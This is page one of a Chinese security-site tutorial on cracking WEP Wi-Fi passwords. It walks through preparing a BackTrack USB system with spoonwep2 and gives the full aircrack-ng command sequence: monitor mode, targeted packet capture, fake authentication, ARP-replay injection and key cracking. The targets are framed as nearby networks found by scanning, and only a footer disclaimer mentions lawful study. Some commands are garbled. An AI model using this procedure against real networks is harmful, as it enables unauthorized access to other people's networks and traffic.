欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

BT3-BT4无线网络破解教程

来源:本站整理 作者:佚名 时间:2017-02-22 TAG: 我要投稿

一、准备篇 1、一个有可破解无线信号的环境。如我在家随便搜索出来的信号。2、带无线网卡的电脑一台(笔记本台式机均可,只要无线网卡兼容BT3),我用 的是三星NC10的上网本。3、2G以上优盘一个(我用的是kingston 8G 的)4、搜索 下载BT3,约800兆。或BT4,约900兆。BT3下载地址: http://f1.soft-3h0jae9frd1g.chnxp.com.cn/BACKTRACK3final_usb.rarBT4 下载地址: http://ftp.belnet.be/mirror/backtrack/bt4-beta.iso
注:BT3 全称BackTrack3,与我们常说的bt下载是完全不同的概念。以我理解就是集成了一些计算机安全软件的linux系统。正是由于它的出世和不断普 及,使得破解可让普通用户轻易言之。5、搜索下载spoonwep2中文包。地址: http://gd.qiannao.com:8080/servlet/FileDownload?filename=//yinghu/上 传分享/2008/11/13/中文包_spoonwep2.rar&vid=0
注:spoonwep2就是我们的破 解软件,一个非常强悍的图形化破解WEP无线网络密码的工具。
二、安装篇
1、将优盘格式化,配置如下图,唯一要注意文件系统选为FAT32就可以了。
2、将刚才下载完成的bt3解压缩,复制到优盘,完成后会看到优盘目录下有两个文件夹,一个boot 一个BT3。如下图:
3、开始安装bt3系统。
点击开始-运行,输入 CMD, 然后回车,进入命令行模式 。
首先输入你优盘的盘符,我这里是h盘,输入h: 然后回车,接下来输入 cd boot 回车,进入到boot文件夹下,最后 bootinst.bat 回车,就会开始安装BT3,如下图:
然后安装会出现一个提示画面,我们别去管它,直接按任意键继续
按任意键后,电脑会自动设置引导记录,整个过程大概10秒左右。出现下面画面 后,此优盘就可以引导系统进去bt3了。
4、集成 spoonwep2软件。
首先把我们先前下载的spoonwep2解压缩,里面是六个扩展名为lzm的文件,将这六个文件复制 到优盘\bt3\modules文件夹下,如图:
这样我们的 bt3系统已经集成安装完毕了,可以动手破解了。
三 破解篇
1、将安装好系统的优盘插入电脑,重启后进入bios,设置优盘为电脑第一启动顺序。(这个如果没设置过,可以问一下其他人,或者在网上找找设置方法,每 台电脑进入bios的方法也不同,如开机按F2,Del,F1等等)
2、设置优盘启动后,电脑会自动带入我们进入bt3操作系 统(如果出现界面选择,你要选择vesa mode),系统界面是这样的(漂亮吧):开始输入指令        ifconfig -a 查看网卡(之后只出现eth0和lo则表示你的无线网卡没有被识别,要是有eth0、wlan、lo等则表示可以)        如果出现wlan网卡(本机无线网卡),则进行    ifconfig -a wlan0 up(此命令用于加载网卡,有的时候直接执行spoonwep是不可以的,需要加载)    然后执行ln -fs bash/bin/sh        再执行 ls -all /bin/sh(显示bash为成功,显示dash为失败)现在开始破解1.在shell窗口中输入 ifconfig 命令 ,出现如下信息:lo no wireless extensions.eth0 no wireless extensions.eth1 IEEE 802.11g ESSID:"" Nickname:""Mode:(......)Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:offEncryption key:offPower Management:offLink Quality=0/94 Signal level=-95 dBm Noise level=-95 dBmRx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0Tx excessive retries:0 Invalid misc:0 Missed beacon:02.找出你的无线网卡名字,我这里是 eth1.再启动你的网卡为Moniter模式(输入airmon-ng start eth1 11)。再输入 ifconfig 命令 ,返回如下信息:lo no wireless extensions.eth0 no wireless extensions.eth1 IEEE 802.11g ESSID:"" Nickname:""Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:offEncryption key:offPower Management:offLink Quality=0/94 Signal level=-95 dBm Noise level=-95 dBmRx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0Tx excessive retries:0 Invalid misc:0 Missed beacon:03. 输入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.命令中的11 表示要破解的频道号,bssid后面的数字表示破解目标的MAC物理地址,outputs表示要生成的包的名称。回车运行。4.再开一个 shell 输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2前面已解释过是指目标MAC物理地址,00:A1:C1:D8:A5:B6表示本机网卡MAC物理地址5.再开一个 shell 输入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1获取更多的数据包。6.返回数据量到1万的时候就可以破解了。再开一个shell输入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 进行破解。如果破解不成功,让它继续抓包,直到破解。3、启动spoonwep2软件
开启一个命令窗口,输入:spoonwep 回车后10秒钟左右弹出spoonwep2程序:

NET CARD 网卡接口 选择 WLAN0DRIVER 驱动 选择 NORMALMODE 模式 选择 UNKNOWN VICTIM点 NEXT 转到 VICTIMS DISCOVERY 窗口

CHAN HOPPING 是全频段扫描 (建议选择: FIXED CHAN,有针对性的扫描)点击右上角 LAUNCH 按钮 (点完后会变成 ABORT ) 这时会弹出抓包窗口,可作为参考,也可不用理会。20秒首先点击左上角下拉菜单选择CHAN HOPPING→LAUNCH(点完后会变成ABORT )→会开始自动执行

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载